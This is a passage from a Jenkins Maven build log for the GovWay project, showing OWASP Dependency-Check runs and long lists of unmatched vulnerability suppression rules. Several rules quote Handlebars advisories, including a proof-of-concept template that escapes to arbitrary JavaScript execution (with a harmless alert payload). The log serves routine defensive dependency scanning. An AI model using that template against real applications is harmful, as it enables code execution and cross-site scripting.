regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:41:02 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:41:02 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:41:02 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:41:02 [INFO] Analysis Complete (1 seconds) 17:41:02 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:41:02 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:41:02 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:41:02 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:41:02 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:41:02 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:41:02 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:41:02 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:41:02 [INFO] 17:41:02 [INFO] ---------------< org.openspcoop2:org.openspcoop2.jetty >---------------- 17:41:02 [INFO] Building dependencies.jetty 1.0 [15/67] 17:41:02 [INFO] from mvn/dependencies/jetty/pom.xml 17:41:02 [INFO] --------------------------------[ pom ]--------------------------------- 17:41:02 [INFO] 17:41:02 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.jetty --- 17:41:02 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/jetty (includes = [*.jar], excludes = []) 17:41:02 [INFO] 17:41:02 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.jetty --- 17:41:02 [INFO] 17:41:02 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.jetty --- 17:41:02 [INFO] Executing tasks 17:41:07 [INFO] Executed tasks 17:41:07 [INFO] 17:41:07 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.jetty --- 17:41:08 [INFO] Checking for updates 17:41:08 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:41:08 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:41:08 [INFO] Check for updates complete (72 ms) 17:41:08 [INFO] 17:41:08 17:41:08 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:41:08 17:41:08 17:41:08 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:41:08 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:41:08 17:41:08 17:41:08 [INFO] Analysis Started 17:41:08 [INFO] Finished File Name Analyzer (0 seconds) 17:41:08 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:41:08 [INFO] Finished Hint Analyzer (0 seconds) 17:41:08 [INFO] Finished Version Filter Analyzer (0 seconds) 17:41:09 [INFO] Created CPE Index (1 seconds) 17:41:09 [INFO] Finished CPE Analyzer (1 seconds) 17:41:09 [INFO] Finished False Positive Analyzer (0 seconds) 17:41:09 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:41:09 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:41:09 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:41:09 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:41:09 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:41:09 [INFO] Analysis Complete (1 seconds) 17:41:09 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:41:09 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:41:09 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:41:09 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:41:09 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:41:09 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:41:09 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:41:09 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:41:09 [INFO] 17:41:09 [INFO] ----------------< org.openspcoop2:org.openspcoop2.jmx >----------------- 17:41:09 [INFO] Building dependencies.jmx 1.0 [16/67] 17:41:09 [INFO] from mvn/dependencies/jmx/pom.xml 17:41:09 [INFO] --------------------------------[ pom ]--------------------------------- 17:41:09 [INFO] 17:41:09 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.jmx --- 17:41:09 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/jmx (includes = [*.jar], excludes = []) 17:41:09 [INFO] 17:41:09 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.jmx --- 17:41:09 [INFO] 17:41:09 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.jmx --- 17:41:09 [INFO] Executing tasks 17:41:14 [INFO] Executed tasks 17:41:14 [INFO] 17:41:14 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.jmx --- 17:41:14 [INFO] Checking for updates 17:41:14 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:41:15 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:41:15 [INFO] Check for updates complete (71 ms) 17:41:15 [INFO] 17:41:15 17:41:15 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:41:15 17:41:15 17:41:15 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:41:15 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:41:15 17:41:15 17:41:15 [INFO] Analysis Started 17:41:15 [INFO] Finished Archive Analyzer (0 seconds) 17:41:15 [INFO] Finished File Name Analyzer (0 seconds) 17:41:15 [INFO] Finished Jar Analyzer (0 seconds) 17:41:15 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:41:15 [INFO] Finished Hint Analyzer (0 seconds) 17:41:15 [INFO] Finished Version Filter Analyzer (0 seconds) 17:41:16 [INFO] Created CPE Index (1 seconds) 17:41:16 [INFO] Finished CPE Analyzer (1 seconds) 17:41:16 [INFO] Finished False Positive Analyzer (0 seconds) 17:41:16 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:41:16 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:41:16 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:41:16 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:41:16 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:41:16 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:41:16 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:41:16 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:41:16 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:41:16 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:41:16 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:41:16 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:41:16 17:41:16 17:41:16 ## Recommendation 17:41:16 17:41:16 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:41:16 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:41:16 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:41:16 17:41:16 The following template can be used to demonstrate the vulnerability: 17:41:16 ```{{#with "constructor"}} 17:41:16 {{#with split as |a|}} 17:41:16 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:41:16 {{#with (concat (lookup join (slice 0 1)))}} 17:41:16 {{#each (slice 2 3)}} 17:41:16 {{#with (apply 0 a)}} 17:41:16 {{.}} 17:41:16 {{/with}} 17:41:16 {{/each}} 17:41:16 {{/with}} 17:41:16 {{/with}} 17:41:16 {{/with}}``` 17:41:16 17:41:16 17:41:16 ## Recommendation 17:41:16 17:41:16 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:41:16 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:41:16 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:41:16 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:41:16 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:41:16 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:41:16 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:41:16 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:41:16 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:41:16 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:41:16 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:41:16 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:41:16 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:41:16 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:41:16 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:41:16 [INFO] Analysis Complete (1 seconds) 17:41:16 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:41:16 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:41:16 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:41:16 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:41:16 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:41:16 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:41:16 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:41:16 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:41:16 [INFO] 17:41:16 [INFO] ----------------< org.openspcoop2:org.openspcoop2.json >---------------- 17:41:16 [INFO] Building dependencies.json 1.0 [17/67] 17:41:16 [INFO] from mvn/dependencies/json/pom.xml 17:41:16 [INFO] --------------------------------[ pom ]--------------------------------- 17:41:16 [INFO] 17:41:16 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.json --- 17:41:16 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/json (includes = [*.jar], excludes = []) 17:41:16 [INFO] 17:41:16 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.json --- 17:41:16 [INFO] 17:41:16 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.json --- 17:41:16 [INFO] Executing tasks 17:41:16 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/json/json-path-2.9.0.jar 17:41:16 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/json/json-schema-validator-2.2.14.jar 17:41:16 [INFO] Executed tasks 17:41:16 [INFO] 17:41:16 [INFO] --- copy-rename:1.0:rename (rename-file-networknt) @ org.openspcoop2.json --- 17:41:16 [INFO] Renamed /var/lib/jenkins/workspace/GovWay/lib/json/json-schema-validator-1.5.7.jar to /var/lib/jenkins/workspace/GovWay/lib/json/networknt_json-schema-validator-1.5.7.jar 17:41:16 [INFO] 17:41:16 [INFO] --- copy-rename:1.0:rename (rename-file-github-validator) @ org.openspcoop2.json --- 17:41:16 [INFO] Renamed /var/lib/jenkins/workspace/GovWay/lib/json/json-schema-validator-2.2.14-gov4j-1.jar to /var/lib/jenkins/workspace/GovWay/lib/json/github_json-schema-validator-2.2.14-gov4j-1.jar 17:41:16 [INFO] 17:41:16 [INFO] --- copy-rename:1.0:rename (rename-file-github-core) @ org.openspcoop2.json --- 17:41:16 [INFO] Renamed /var/lib/jenkins/workspace/GovWay/lib/json/json-schema-core-1.2.14.jar to /var/lib/jenkins/workspace/GovWay/lib/json/github_json-schema-core-1.2.14.jar 17:41:16 [INFO] 17:41:16 [INFO] --- copy-rename:1.0:rename (rename-file-github-jackson) @ org.openspcoop2.json --- 17:41:16 [INFO] Renamed /var/lib/jenkins/workspace/GovWay/lib/json/jackson-coreutils-2.0.jar to /var/lib/jenkins/workspace/GovWay/lib/json/github_jackson-coreutils-2.0.jar 17:41:16 [INFO] 17:41:16 [INFO] --- copy-rename:1.0:rename (rename-file-github-jackson-equivalence) @ org.openspcoop2.json --- 17:41:16 [INFO] Renamed /var/lib/jenkins/workspace/GovWay/lib/json/jackson-coreutils-equivalence-1.0.jar to /var/lib/jenkins/workspace/GovWay/lib/json/github_jackson-coreutils-equivalence-1.0.jar 17:41:16 [INFO] 17:41:16 [INFO] --- copy-rename:1.0:rename (rename-file-github-uri-template) @ org.openspcoop2.json --- 17:41:16 [INFO] Renamed /var/lib/jenkins/workspace/GovWay/lib/json/uri-template-0.10.jar to /var/lib/jenkins/workspace/GovWay/lib/json/github_uri-template-0.10.jar 17:41:16 [INFO] 17:41:16 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.json --- 17:41:16 [INFO] Executing tasks 17:41:21 [INFO] Executed tasks 17:41:21 [INFO] 17:41:21 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.json --- 17:41:22 [INFO] Checking for updates 17:41:22 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:41:22 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:41:22 [INFO] Check for updates complete (73 ms) 17:41:22 [INFO] 17:41:22 17:41:22 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:41:22 17:41:22 17:41:22 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:41:22 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:41:22 17:41:22 17:41:22 [INFO] Analysis Started 17:41:22 [INFO] Finished Archive Analyzer (0 seconds) 17:41:22 [INFO] Finished File Name Analyzer (0 seconds) 17:41:22 [INFO] Finished Jar Analyzer (0 seconds) 17:41:22 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:41:22 [INFO] Finished Hint Analyzer (0 seconds) 17:41:22 [INFO] Finished Version Filter Analyzer (0 seconds) 17:41:23 [INFO] Created CPE Index (1 seconds) 17:41:24 [INFO] Finished CPE Analyzer (1 seconds) 17:41:24 [INFO] Finished False Positive Analyzer (0 seconds) 17:41:24 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:41:24 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:41:24 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:41:24 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:41:24 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:41:24 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:41:24 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:41:24 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:41:24 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:41:24 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:41:24 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:41:24 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:41:24 17:41:24 17:41:24 ## Recommendation 17:41:24 17:41:24 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:41:24 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:41:24 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:41:24 17:41:24 The following template can be used to demonstrate the vulnerability: 17:41:24 ```{{#with "constructor"}} 17:41:24 {{#with split as |a|}} 17:41:24 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:41:24 {{#with (concat (lookup join (slice 0 1)))}} 17:41:24 {{#each (slice 2 3)}} 17:41:24 {{#with (apply 0 a)}} 17:41:24 {{.}} 17:41:24 {{/with}} 17:41:24 {{/each}} 17:41:24 {{/with}} 17:41:24 {{/with}} 17:41:24 {{/with}}``` 17:41:24 17:41:24 17:41:24 ## Recommendation 17:41:24 17:41:24 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:41:24 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:41:24 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:41:24 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:41:24 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:41:24 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:41:24 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:41:24 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:41:24 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:41:24 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:41:24 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:41:24 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:41:24 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:41:24 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:41:24 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:41:24 [INFO] Analysis Complete (1 seconds) 17:41:24 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:41:24 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:41:24 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:41:24 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:41:24 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:41:24 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:41:24 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:41:24 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:41:24 [INFO] 17:41:24 [INFO] ----------------< org.openspcoop2:org.openspcoop2.log >----------------- 17:41:24 [INFO] Building dependencies.log 1.0 [18/67] 17:41:24 [INFO] from mvn/dependencies/log/pom.xml 17:41:24 [INFO] --------------------------------[ pom ]--------------------------------- 17:41:24 [INFO] 17:41:24 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.log --- 17:41:24 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/log (includes = [*.jar], excludes = 